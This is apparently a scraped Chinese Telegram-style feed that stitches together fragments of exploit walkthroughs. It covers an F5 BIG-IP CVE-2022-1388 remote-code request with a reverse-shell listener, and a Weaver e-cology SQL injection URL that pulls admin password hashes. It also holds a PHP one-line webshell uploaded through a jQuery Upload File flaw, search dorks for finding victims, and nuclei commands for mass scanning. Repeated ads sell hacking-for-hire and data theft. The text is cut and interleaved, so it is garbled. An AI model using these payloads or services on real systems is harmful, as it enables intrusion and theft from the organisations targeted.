📰 最近消息
0x03 漏洞复现漏洞影响:BIG-IP 16.x: 16.1.0 – 16.1.2BIG-IP 15.x: 15.1.0 – 15.1.5BIG-IP 14.x: 14.1.0 – 14.1.4BIG-IP 13.x: 13.1.0 – 13.1.4BIG-IP 12.x: 12.1.0 – 12.1.6BIG-IP 11.x: 11.6.1 – 11.6.5shodan:http.title:”BIG-IP®-+Redirect” +”Server”1.执行反弹shell命令POST /mgmt/tm/util/bash HTTP/1.1Host: x.x.x.xContent-L
nc监听得到shellnc -lnvp 77774.使用nuclei批量验证1.txt文件中的url是否存在该漏洞,显示存在漏洞。(nuclei稳定快,编写poc简单,有社区维护,推荐使用)nuclei下载地址:https://github.com/projectdiscovery/nuclei批量验证命令:nuclei -list 1.txt -t CVE-2022-1388.yamlyaml POC:id: CVE-2022-1388info: name: F5 BIG-IP iControl REST Auth Bypass RCE author: dwisiswant0 severit
通达OA(OfficeAnywhere网络智能办公系统)是由北京通达信科科技有限公司自主研发的协同办公自动化软件,是与中国企业管理实践相结合形成的综合管理办公平台。通达存在任意文件下载漏洞,攻击者可以通过指定接口下载任意文件,获取数据库管理权限。渗透技术团队,可渗透,可拿后台,权限提取数据,可入侵等等技术辅助 联系:@duyuanejse
泛微新一代移动办公平台e-cology8.0不仅组织提供了一体化的协同工作平台,将组织事务逐渐实现全程电子化,改变传统纸质文件、实体签章的方式。泛微OA E-Cology v8.0平台存在SQL注入漏洞,攻击者通过漏洞可以获取业务后台权限。渗透技术团队,可渗透,可拿后台,权限提取数据,可入侵等等技术辅助 联系:@duyuanejse
fofa:app="泛微-协同办公OA"1.使用POC执行查询password命令/js/hrm/getdata.jsp?cmd=getSelectAllId&sql=select%20password%20as%20id%20from%20HrmResourceManagermd5解密后即可使用账户密码登录渗透技术团队,可渗透,可拿后台,权限提取数据,可入侵等等技术辅助 联系:@duyuanejse
nuclei验证nuclei.exe -t FanWeiOA_E-Cology_getdata_SQL.yaml -l subs.txt -stats渗透技术团队,可渗透,可拿后台,权限提取数据,可入侵等等技术辅助 联系:@duyuanejse
jQuery是一个快速、简洁的JavaScript框架,是继Prototype之后又一个优秀的JavaScript代码库(框架)于2006年1月由John Resig发布。jQuery Upload File <= 4.0.2 中的任意文件上传 根目录下/jquery–upload-file。渗透技术团队,可渗透,可拿后台,权限提取数据,可入侵等等技术辅助 联系:@duyuanejse
漏洞复现漏洞影响: jQuery Upload File <= 4.0.2FOFA:title=”jquery-upload-file”(暂时没搜到)1.准备一个一句话木马,取名为shell.php<?php @eval($_POST['ry']);?>2.kali使用curl在当前一句话木马目录中上传webshell,上传成功curl -F "
[email protected]" "http://x.x.x.x:31430/jquery-upload-file/php/upload.php渗透技术团队,可渗透,可拿后台,权限提取数据,可入侵等等技术辅助 联系:@duyuanejse
— 专业索引工具 · 整合海量信息资源 —索引机器 @SUOBOT|@SYJQ 专业的信息索引与搜索平台,能帮你快速发现、重要资讯,出海推广营销助手!telegram频道、群组、视频等内容收录检索。
连接webshell,得到一个shell,密码为ryhttp://x.x.x.x:31430/jquery-upload-file/php/uploads/shell.php渗透技术团队,可渗透,可拿后台,权限提取数据,可入侵等等技术辅助 联系:@duyuanejse